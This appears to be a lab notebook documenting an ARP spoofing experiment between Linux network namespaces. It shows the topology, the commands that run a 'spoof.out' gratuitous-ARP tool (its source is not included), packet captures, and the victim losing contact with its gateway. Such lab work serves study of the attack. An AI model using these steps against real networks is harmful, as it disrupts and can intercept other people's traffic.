seantywork

01

-------------------------
|   host                |
|  11.168.0.1 (veth01)  |
|  82 59 88 10 d3 fe    |
-------------------------
        |
        |
--------------------------
|   vnet0                |    ------------------------
|   bridge (vbr0)        |    | vnet2 (attacker 😈)  |
|    arp_accept enabled, |----| 11.168.0.200 (veth21)|
|    vulnerable to       |    | 22 e8 90 6d 69 e5    |
|    arp spoofing        |    ------------------------
--------------------------
        |
        |
--------------------------
|   vnet1                |
|   11.168.0.2 (veth11)  |
|   26 08 9a c4 c6 d3    |
--------------------------


02

$ sudo ip netns exec vnet1 ip neigh
# no mac info 
$ 

03

$ sudo ip netns exec vnet1 ping 11.168.0.1
PING 11.168.0.1 (11.168.0.1) 56(84) bytes of data.
64 bytes from 11.168.0.1: icmp_seq=1 ttl=64 time=0.084 ms
64 bytes from 11.168.0.1: icmp_seq=2 ttl=64 time=0.047 ms
64 bytes from 11.168.0.1: icmp_seq=3 ttl=64 time=0.059 ms
64 bytes from 11.168.0.1: icmp_seq=4 ttl=64 time=0.050 ms
^C
--- 11.168.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3072ms
rtt min/avg/max/mdev = 0.047/0.060/0.084/0.014 ms

04

$ sudo ip netns exec vnet1 ip neigh
# now there is mac info!
11.168.0.1 dev veth11 lladdr 82:59:88:10:d3:fe REACHABLE

05

$ sudo ip netns exec vnet1 ip neigh flush all
$ sudo ip netns exec vnet1 ip neigh 
$

06

$ sudo ip netns exec vnet2 ./spoof.out g
my: ifidx: 2 ip: 11.168.0.200 hw: 22 e8 90 6d 69 e5
victim: ip: 11.168.0.2 hw: 26 08 9a c4 c6 d3
gateway: ip: 11.168.0.1 hw: 82 59 88 10 d3 fe
spoofing? 

07

$ sudo ip netns exec vnet0 tshark -i vbr0
[sudo] password for thy: 
Running as user "root" and group "root". This could be dangerous.
Capturing on 'vbr0'
    1 0.000000000 22:e8:90:6d:69:e5 → Broadcast    ARP 42 Who has 11.168.0.2? Tell 11.168.0.200
    2 0.000037175 26:08:9a:c4:c6:d3 → 22:e8:90:6d:69:e5 ARP 42 11.168.0.2 is at 26:08:9a:c4:c6:d3
    3 0.000059438 22:e8:90:6d:69:e5 → Broadcast    ARP 42 Who has 11.168.0.1? Tell 11.168.0.200
    4 0.000069170 82:59:88:10:d3:fe → 22:e8:90:6d:69:e5 ARP 42 11.168.0.1 is at 82:59:88:10:d3:fe


08

$ sudo ip netns exec vnet1 ip neigh 
11.168.0.200 dev veth11 lladdr 22:e8:90:6d:69:e5 STALE

09

$ sudo ip netns exec vnet2 ./spoof.out g
my: ifidx: 2 ip: 11.168.0.200 hw: 22 e8 90 6d 69 e5
victim: ip: 11.168.0.2 hw: 26 08 9a c4 c6 d3
gateway: ip: 11.168.0.1 hw: 82 59 88 10 d3 fe
spoofing? 
gratuitous arp...
gratuitous arp...

10

Frame 4: 42 bytes on wire (336 bits), 42 bytes captured (336 bits) on interface vbr0, id 0
    Section number: 1
    Interface id: 0 (vbr0)
        Interface name: vbr0
    Encapsulation type: Ethernet (1)
    Arrival Time: Sep  2, 2025 13:43:07.035245849 KST
    UTC Arrival Time: Sep  2, 2025 04:43:07.035245849 UTC
    Epoch Arrival Time: 1756788187.035245849
    [Time shift for this packet: 0.000000000 seconds]
    [Time delta from previous captured frame: 5.000146902 seconds]
    [Time delta from previous displayed frame: 5.000146902 seconds]
    [Time since reference or first frame: 15.000502026 seconds]
    Frame Number: 4
    Frame Length: 42 bytes (336 bits)
    Capture Length: 42 bytes (336 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:arp]
Ethernet II, Src: 22:e8:90:6d:69:e5 (22:e8:90:6d:69:e5), Dst: Broadcast (ff:ff:ff:ff:ff:ff)
    Destination: Broadcast (ff:ff:ff:ff:ff:ff)
        Address: Broadcast (ff:ff:ff:ff:ff:ff)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...1 .... .... .... .... = IG bit: Group address (multicast/broadcast)
    Source: 22:e8:90:6d:69:e5 (22:e8:90:6d:69:e5)
        Address: 22:e8:90:6d:69:e5 (22:e8:90:6d:69:e5)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: ARP (0x0806)
Address Resolution Protocol (request/gratuitous ARP)
    Hardware type: Ethernet (1)
    Protocol type: IPv4 (0x0800)
    Hardware size: 6
    Protocol size: 4
    Opcode: request (1)
    [Is gratuitous: True]
    Sender MAC address: 22:e8:90:6d:69:e5 (22:e8:90:6d:69:e5)
    Sender IP address: 11.168.0.1
    Target MAC address: Broadcast (ff:ff:ff:ff:ff:ff)
    Target IP address: 11.168.0.1

11

$ sudo ip netns exec vnet1 ping 11.168.0.1
PING 11.168.0.1 (11.168.0.1) 56(84) bytes of data.
64 bytes from 11.168.0.1: icmp_seq=1 ttl=64 time=0.129 ms
64 bytes from 11.168.0.1: icmp_seq=34 ttl=64 time=0.169 ms
^C
--- 11.168.0.1 ping statistics ---
35 packets transmitted, 2 received, 94.2857% packet loss, time 34812ms
rtt min/avg/max/mdev = 0.129/0.149/0.169/0.020 ms


12

$ sudo ip netns exec vnet0 tshark -i vbr0 -f "icmp"
Running as user "root" and group "root". This could be dangerous.
Capturing on 'vbr0'
    1 0.000000000   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=1/256, ttl=64
    2 0.000063576   11.168.0.1 → 11.168.0.2   ICMP 98 Echo (ping) reply    id=0xa180, seq=1/256, ttl=64 (request in 1)
    3 1.019965141   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=2/512, ttl=64
    4 2.044919873   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=3/768, ttl=64
    5 3.067998313   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=4/1024, ttl=64
    6 4.091929811   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=5/1280, ttl=64
    7 5.115978551   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=6/1536, ttl=64
    8 6.140009603   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=7/1792, ttl=64
    9 7.163937904   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=8/2048, ttl=64
   10 8.187997388   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=9/2304, ttl=64
   11 9.211988746   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=10/2560, ttl=64
   12 10.236013397   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=11/2816, ttl=64
   13 11.260045390   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=12/3072, ttl=64
   14 12.283941056   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=13/3328, ttl=64
   15 13.307911841   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=14/3584, ttl=64
   16 14.331996693   11.168.0.2 → 11.168.0.1   ICMP 98 Echo (ping) request  id=0xa180, seq=15/3840, ttl=64


13


$ sudo ip netns exec vnet1 ip neigh 
11.168.0.200 dev veth11 lladdr 22:e8:90:6d:69:e5 STALE 
11.168.0.1 dev veth11 FAILED